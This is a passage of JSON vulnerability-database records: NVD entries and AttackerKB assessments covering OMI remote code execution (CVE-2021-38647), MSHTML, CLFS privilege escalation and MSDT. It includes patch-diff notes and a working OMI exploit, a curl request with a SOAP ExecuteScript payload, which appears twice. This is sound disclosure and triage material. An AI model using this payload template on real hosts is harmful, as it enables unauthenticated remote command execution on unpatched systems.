"cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:12", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38647", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:azure_automation_update_management:-", "cpe:/a:microsoft:azure_automation_state_configuration:-", "cpe:/a:microsoft:azure_diagnostics_\\(lad\\):-", "cpe:/a:microsoft:azure_security_center:-", "cpe:/a:microsoft:azure_stack_hub:-", "cpe:/a:microsoft:azure_open_management_infrastructure:-", "cpe:/a:microsoft:azure_sentinel:-", "cpe:/a:microsoft:system_center_operations_manager:-", "cpe:/a:microsoft:container_monitoring_solution:-", "cpe:/a:microsoft:log_analytics_agent:-"], "id": "CVE-2021-38647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_diagnostics_\\(lad\\):-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_sentinel:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_open_management_infrastructure:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_security_center:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_stack_hub:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:42:50", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-40444", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-14T11:49:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-40444", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2023-08-20T08:36:22", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-36963.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-38633", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-27T00:00:00", "id": "AKB:35FD7D35-F3F0-4CE6-A919-5DE145C48A21", "href": "https://attackerkb.com/topics/klyxyRRj9Z/cve-2021-38633", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-25T17:11:49", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36963, CVE-2021-38633.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at September 18, 2021 12:23am UTC reported:\n\nHmm so this is quite an interesting one. This is similar to CVE-2021-36963 and CVE-2021-38633, both of which are marked as low complexity for being exploited and which will likely get you SYSTEM access, however if you look at the advisory for this bug at <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36955> it is the only one where the \u201cExploit Code Maturity\u201d is marked as \u201cFunctional\u201d in other words Microsoft has verified that code exists to exploit this vulnerability and it works under most scenarios.\n\nAgain this is still only local privilege escalation so this isn\u2019t triggerable remotely, hence why the severity is high due to M.S saying this is easy to form an exploit for and the fact that functional exploit code exists according to M.S, however it isn\u2019t Very High since you still need access to an account on the target to exploit this.\n\nGiven that this gives SYSTEM level code access and its not hard to make an exploit for it according to Microsoft I would patch this sooner rather than later along with CVE-2021-36963 and CVE-2021-38633. I am still investigating this deeper to figure out what was patched but here is the list of functions within clfs.sys that I believe were patched as part of fixing this bug:\n \n \n 00012\t1c00299b4\tprivate: long CClfsBaseFilePersisted::CreateContainer(struct _UNICODE_STRING const &,unsigned __int64 const &,unsigned long,unsigned char,unsigned char,class CClfsContainer * &)\t1c0028824\tprivate: long CClfsBaseFilePersisted::CreateContainer(struct _UNICODE_STRING const &,unsigned __int64 const &,unsigned long,unsigned char,unsigned char,class CClfsContainer * &)\t0.990\t62\t61\tPerfect match, same name\n 00013\t1c0029d74\tpublic: long CClfsContainer::Create(struct _UNICODE_STRING &,unsigned __int64 const &,struct _CLFS_FILTER_CONTEXT const &,void * const,unsigned char,unsigned char &)\t1c0028bdc\tpublic: long CClfsContainer::Create(struct _UNICODE_STRING &,unsigned __int64 const &,struct _CLFS_FILTER_CONTEXT const &,void * const,unsigned char,unsigned char &)\t0.950\t50\t49\tPerfect match, same name\n 00024\t1c0031a68\tpublic: long CClfsBaseFile::GetSymbol(long,unsigned char,struct _CLFS_CLIENT_CONTEXT * *)\t1c00308c8\tpublic: long CClfsBaseFile::GetSymbol(long,unsigned char,struct _CLFS_CLIENT_CONTEXT * *)\t0.950\t14\t17\tPerfect match, same name\n 00026\t1c0032550\tClfsCreateLogFile\t1c00313d0\tClfsCreateLogFile\t0.910\t169\t164\tPerfect match, same name\n 00025\t1c0032420\tpublic: long CClfsBaseFile::GetSymbol(long,unsigned long,struct _CLFS_CONTAINER_CONTEXT * *)\t1c0031290\tpublic: long CClfsBaseFile::GetSymbol(long,unsigned long,struct _CLFS_CONTAINER_CONTEXT * *)\t0.870\t17\t20\tPerfect match, same name\n 00047\t1c004f3d8\tprivate: long CClfsBaseFilePersisted::ExtendMetadataBlockDescriptor(unsigned long,unsigned long)\t1c004e238\tprivate: long CClfsBaseFilePersisted::ExtendMetadataBlockDescriptor(unsigned long,unsigned long)\t0.740\t41\t46\tPerfect match, same name\n \n\nMore details to come when I get the analysis finished some more.\n\nSo far that the function `Feature_Servicing_2103c_ClfsStatusPrivilegeNotHeld_31093721__private_IsEnabled()` was removed from the new build of `clfs.sys`, and also from the `CClfsBaseFilePersisted::CreateContainer` call where it was called from. Now it directly checks the return code from `CClfsContainer::Create(_UNICODE_STRING &,unsigned __int64 const &,_CLFS_FILTER_CONTEXT const &,void * const,uchar,uchar &)` to see if it returned the status code `STATUS_PRIVILEGE_NOT_HELD` whereas before it would check the return code of `Feature_Servicing_2103c_ClfsStatusPrivilegeNotHeld_31093721__private_IsEnabled()` for this status.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-36955", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-25T00:00:00", "id": "AKB:86B09C61-4CEE-48AD-9C51-8E9476DAE9F1", "href": "https://attackerkb.com/topics/Ftp2XNmtf4/cve-2021-36955", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:20:59", "description": "Open Management Infrastructure Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 15, 2021 4:37am UTC reported:\n\nRCE PoC using [`ExecuteScript`](<https://github.com/microsoft/SCXcore#runas-provider-executescript>) (multi-line shell script execution):\n \n \n wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H \"Content-Type: application/soap+xml\" -d @payload.xml | xmllint --format -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)\n > POST /wsman HTTP/1.1\n > Host: 127.0.0.1:5985\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/soap+xml\n > Content-Length: 1679\n > Expect: 100-continue\n >\n * Done waiting for 100-continue\n } [1679 bytes data]\n * We are completely uploaded and fine\n < HTTP/1.1 200 OK\n < Content-Length: 1393\n < Connection: Keep-Alive\n < Content-Type: application/soap+xml;charset=UTF-8\n <\n { [1393 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n * Closing connection 0\n <?xml version=\"1.0\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsen=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:e=\"http://schemas.xmlsoap.org/ws/2004/08/eventing\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:wsmb=\"http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:wxf=\"http://schemas.xmlsoap.org/ws/2004/09/transfer\" xmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\" xmlns:msftwinrm=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\" xmlns:wsmid=\"http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd\">\n <SOAP-ENV:Header>\n <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>\n <wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>\n <wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>\n <wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>\n </SOAP-ENV:Header>\n <SOAP-ENV:Body>\n <p:SCX_OperatingSystem_OUTPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:ReturnValue>TRUE</p:ReturnValue>\n <p:ReturnCode>0</p:ReturnCode>\n <p:StdOut>\n Hello\n Goodbye\n </p:StdOut>\n <p:StdErr/>\n </p:SCX_OperatingSystem_OUTPUT>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n wvu@kharak:~/Downloads$\n \n\n`payload.xml`:\n \n \n <?xml version=\"1.0\"?>\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n \n\n[More context\u2026](<https://twitter.com/wvuuuuuuuuuuuuu/status/1438002644228968452>)\n\n**noraj** at March 31, 2022 8:33pm UTC reported:\n\nRCE PoC using [`ExecuteScript`](<https://github.com/microsoft/SCXcore#runas-provider-executescript>) (multi-line shell script execution):\n \n \n wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H \"Content-Type: application/soap+xml\" -d @payload.xml | xmllint --format -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)\n > POST /wsman HTTP/1.1\n > Host: 127.0.0.1:5985\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/soap+xml\n > Content-Length: 1679\n > Expect: 100-continue\n >\n * Done waiting for 100-continue\n } [1679 bytes data]\n * We are completely uploaded and fine\n < HTTP/1.1 200 OK\n < Content-Length: 1393\n < Connection: Keep-Alive\n < Content-Type: application/soap+xml;charset=UTF-8\n <\n { [1393 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n * Closing connection 0\n <?xml version=\"1.0\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsen=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:e=\"http://schemas.xmlsoap.org/ws/2004/08/eventing\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:wsmb=\"http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:wxf=\"http://schemas.xmlsoap.org/ws/2004/09/transfer\" xmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\" xmlns:msftwinrm=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\" xmlns:wsmid=\"http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd\">\n <SOAP-ENV:Header>\n <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>\n <wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>\n <wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>\n <wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>\n </SOAP-ENV:Header>\n <SOAP-ENV:Body>\n <p:SCX_OperatingSystem_OUTPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:ReturnValue>TRUE</p:ReturnValue>\n <p:ReturnCode>0</p:ReturnCode>\n <p:StdOut>\n Hello\n Goodbye\n </p:StdOut>\n <p:StdErr/>\n </p:SCX_OperatingSystem_OUTPUT>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n wvu@kharak:~/Downloads$\n \n\n`payload.xml`:\n \n \n <?xml version=\"1.0\"?>\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n \n\n[More context\u2026](<https://twitter.com/wvuuuuuuuuuuuuu/status/1438002644228968452>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-38647", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-27T00:00:00", "id": "AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "href": "https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:17:15", "description": "Microsoft MSHTML Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**JunquerGJ** at September 07, 2021 10:50pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**ccondon-r7** at September 07, 2021 7:12pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**nu11secur1ty** at September 22, 2021 4:28pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**NinjaOperator** at September 07, 2021 6:45pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-40444", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-25T00:00:00", "id": "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0", "href": "https://attackerkb.com/topics/6ojqzQoPox/cve-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-12T02:18:12", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at May 31, 2022 12:56pm UTC reported:\n\nEDIT: This was a quick description, and while it is still accurate as far as I know, A Rapid7 Evaluation with greater analysis has been published here: 